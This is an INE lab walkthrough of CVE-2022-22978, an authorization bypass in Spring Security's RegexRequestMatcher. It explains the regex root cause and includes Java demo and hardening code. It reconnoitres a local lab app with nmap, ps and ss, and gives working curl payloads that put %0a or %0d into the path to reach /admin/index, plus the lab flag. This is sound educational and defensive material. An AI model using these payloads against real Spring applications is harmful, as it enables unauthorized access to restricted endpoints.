10 November 22

[CVE-2022-22978]: Authorization Bypass in RegexRequestMatcher

Posted by INE

In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

Introduction

What is Spring Security?

Spring Security is a powerful and highly customizable authentication and access-control framework. It is the de-facto standard for securing Spring-based applications.

Spring Security is a framework that focuses on providing both authentication and authorization to Java applications. Like all Spring projects, the real power of Spring Security is found in how easily it can be extended to meet custom requirements.

Reference: https://spring.io/projects/spring-security

Authorization Bypass in RegexRequestMatcher (CVE-2022-22978)

In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with . in the regular expression are possibly vulnerable to an authorization bypass.

Reference: https://nvd.nist.gov/vuln/detail/CVE-2022-22978

NVD has assigned a base score of 9.8 (Critical) to this vulnerability!

The vulnerability

Applications using RegexRequestMatcher with a regular expression that contains . (in practice almost always as .*) are likely vulnerable to an authorization bypass. The root cause is a java.util.regex default: unless the pattern is compiled with DOTALL, . does not match line terminators such as \n and \r, and RegexRequestMatcher requires the whole request path to match. A path such as /admin/%0aindex, which some servlet containers decode to /admin/\nindex and still route to the same handler, therefore fails to match /admin/.*, and the authorization rule attached to that pattern is never applied. Affected versions:

  • Spring Security 5.5.x prior to 5.5.7

  • Spring Security 5.6.x prior to 5.6.4

  • Earlier unsupported versions

Reference: https://tanzu.vmware.com/security/cve-2022-22978
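The behaviour described above, as an added example written for this post (it is not the lab's code and not the Spring Security source): a reduced model of the matcher's whole-path match in plain java.util.regex, run over a few constructed request paths, with the vulnerable compilation (no flags) beside the fixed one (Pattern.DOTALL, which is what the patched releases use). The rule string /admin/.* and the sample paths are assumptions for illustration.

```java
import java.util.List;
import java.util.regex.Pattern;

/**
 * Added example (not from the INE post or the Spring Security code base):
 * a reduced model of what RegexRequestMatcher does with the request path,
 * showing why "/admin/.*" fails to match a path containing a line terminator
 * and how compiling with Pattern.DOTALL closes the gap.
 */
public class RegexMatcherDemo {

    // RegexRequestMatcher-style rule: the whole path must match the regex
    // (matches(), not find()). flags == 0 models the vulnerable versions;
    // Pattern.DOTALL models the fix, under which '.' also matches \n and \r.
    static boolean isProtected(String regex, int flags, String path) {
        return Pattern.compile(regex, flags).matcher(path).matches();
    }

    public static void main(String[] args) {
        String rule = "/admin/.*"; // assumed rule, as in regexMatchers("/admin/.*")

        // Constructed sample paths as the servlet container hands them to the
        // matcher after URL-decoding: %0a -> '\n', %0d -> '\r'.
        List<String> paths = List.of(
                "/admin/index",      // normal request, must stay protected
                "/admin/\nindex",    // /admin/%0aindex
                "/admin/\rindex",    // /admin/%0dindex
                "/admin/index\n",    // /admin/index%0a
                "/admin/index\r");   // /admin/index%0d

        System.out.printf("%-18s %-12s %-12s%n", "path", "vulnerable", "DOTALL");
        for (String p : paths) {
            boolean vulnerable = isProtected(rule, 0, p);
            boolean fixed = isProtected(rule, Pattern.DOTALL, p);
            // Print the path with the control characters made visible.
            String shown = p.replace("\n", "\\n").replace("\r", "\\r");
            System.out.printf("%-18s %-12b %-12b%n", shown, vulnerable, fixed);
        }
    }
}
```

Compile and run with javac RegexMatcherDemo.java && java RegexMatcherDemo. Only the first row, /admin/index, is true in the vulnerable column, because without DOTALL the `.` in `.*` cannot consume the line terminator and the whole-path match fails; every row is true once DOTALL is set, which is why upgrading to a fixed release closes the bypass for existing regex rules without rewriting them.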

Lab Environment

In this lab environment, the user is going to get access to a low-privileged user in an Ubuntu CLI instance. The root user on the same Ubuntu instance is hosting an application leveraging Spring Security that is vulnerable to CVE-2022-22978 and is accessible from the tools installed on the Ubuntu machine at http://127.0.0.1:8080.

Objective: Exploit the authorization bypass in RegexRequestMatcher, in the vulnerable Spring Security-based application to access the restricted endpoint — /admin/index.


https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/24fe9c5e-582f-4495-b8aa-20f3ddaf9770

Acknowledgments

The setup code is based on the following GitHub repository:

Tools

The best tools for this lab are:

  • cURL

  • Nmap

Solution

Step 1: Scan the machine for open ports using Nmap.

Once the lab link is opened, you should have access to an Ubuntu CLI instance.

Run the following command to scan the machine for open ports:

Command:

nmap 127.0.0.1


Port 8080 is open!

Step 2: Check the running processes and listening connections list.

List the running processes:

Command:

ps aux


Notice the java process is running with root privileges.

Check the complete command line for that process entry. ps truncates its output to the terminal width, so redirect it to a file (or widen it with ps auxww); reading /proc/<pid>/cmdline works as well:

Command:

ps aux > out

cat out


It is a Spring Security-based application.

Check for the active listening TCP ports:

Command:

ss -pant


Port 8080 is the only listening port not otherwise accounted for, so it is the likely candidate for the Spring Security-based application. Note that ss -p can only attach a process name to sockets owned by the current user; as a low-privileged user we do not see the root-owned java process next to its socket, which is why this is an inference rather than a direct reading.

It can be confirmed by sending a curl request to the candidate port.

Step 3: Send a request to the Java application on port 8080.

Command:

curl http://127.0.0.1:8080


Notice one link in the response: /admin/index.

Request that link:

Command:

curl http://127.0.0.1:8080/admin/index


The response is 403 Forbidden: the route sits behind an authorization rule and is meant to be reachable only by authorized users.

Step 4: Search for Spring Security authorization bypass exploits.

Search Query:

spring security authorization bypass


As stated on Snyk’s website:

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authorization Bypass via the RegexRequestMatcher class, which can easily be misconfigured to be bypassed on some servlet containers when it is used with . in the regular expression.


Check the PoC link:

URL: https://github.com/ducluongtran9121/CVE-2022-22978-PoC


The PoC shows the bypass against a regex rule such as regexMatchers("/admin/.*"): an encoded line terminator, %0a (\n) or %0d (\r), is inserted into the URI. Because . in a Java regular expression does not match a line terminator unless the pattern is compiled with DOTALL, and RegexRequestMatcher requires the whole path to match, the doctored path no longer matches the protected pattern, the authorization rule is skipped, and the servlet container still delivers the request to the same handler.

We can supply %0a or %0d in the URI to bypass the authorization checks and access the restricted endpoint!

Step 5: Exploit CVE-2022-22978 to bypass the enforced authorization checks.

Send the following curl request to bypass the authorization checks:

Command:

curl http://127.0.0.1:8080/admin/%0aindex


The flag is retrieved back in the response:

Flag: 23e0520ade6129343e4c1d9fd63120ea

Alternatively, send the following request to bypass the authorization checks:

Command:

curl http://127.0.0.1:8080/admin/%0dindex


Curious readers can try these requests as well; a line terminator at the end of the path defeats the whole-path match just as one in the middle does:

Command:

curl http://127.0.0.1:8080/admin/index%0a


Command:

curl http://127.0.0.1:8080/admin/index%0d


With that, we conclude this lab on authorization bypass in RegexRequestMatcher in Spring Security-based applications. The fix is to upgrade to Spring Security 5.5.7 or 5.6.4 (or later), where RegexRequestMatcher compiles its pattern with DOTALL so that . also matches line terminators. As defense in depth, prefer Ant- or MVC-style matchers over hand-written regular expressions for path-based rules, and end the rule set with a restrictive anyRequest() rule so that a path no rule matches is not silently served.
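For readers who own such an application, here is the configuration shape that is exposed, next to a hardened form, as an added example (it is not the lab application's configuration and not Spring Security's own code). It targets the Spring Security 5.x API used by the affected versions; the role name ADMIN, the /admin/** path and the choice of HTTP Basic authentication are assumptions.

```java
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.web.SecurityFilterChain;

/**
 * Added example (not the lab application's code): the shape of a Spring
 * Security 5.x configuration that is exposed to CVE-2022-22978, next to a
 * hardened form. Role name, paths and HTTP Basic are assumed for illustration.
 */
@Configuration
@EnableWebSecurity
public class SecurityConfig {

    /*
     * Vulnerable shape on spring-security-web 5.5.6 / 5.6.3 and older: the
     * only rule is a regex containing '.', so a path such as "/admin/\nindex"
     * (sent as /admin/%0aindex) matches nothing, falls through to the
     * permissive catch-all and reaches the controller without the ADMIN check.
     *
     *   http.authorizeRequests()
     *       .regexMatchers("/admin/.*").hasRole("ADMIN")
     *       .anyRequest().permitAll();
     */

    @Bean
    public SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
        http.authorizeRequests()
                // Ant-style matcher instead of a regex: the "**" segment
                // wildcard is matched segment by segment, not through a
                // '.'-based regular expression, so a line terminator in the
                // path does not take the request out of the protected set.
                // hasRole("ADMIN") checks for the authority "ROLE_ADMIN".
                .antMatchers("/admin/**").hasRole("ADMIN")
                // Restrictive catch-all: a path that matches no earlier rule
                // still requires authentication instead of being served.
                .anyRequest().authenticated()
                .and()
                .httpBasic();
        return http.build();
    }
}
```

The hardened form is a mitigation, not a substitute for the upgrade: on 5.5.7 / 5.6.4 and later the regex variant itself becomes safe because RegexRequestMatcher compiles its pattern with DOTALL, and keeping the library current also picks up fixes this post does not cover.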


© 2022 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.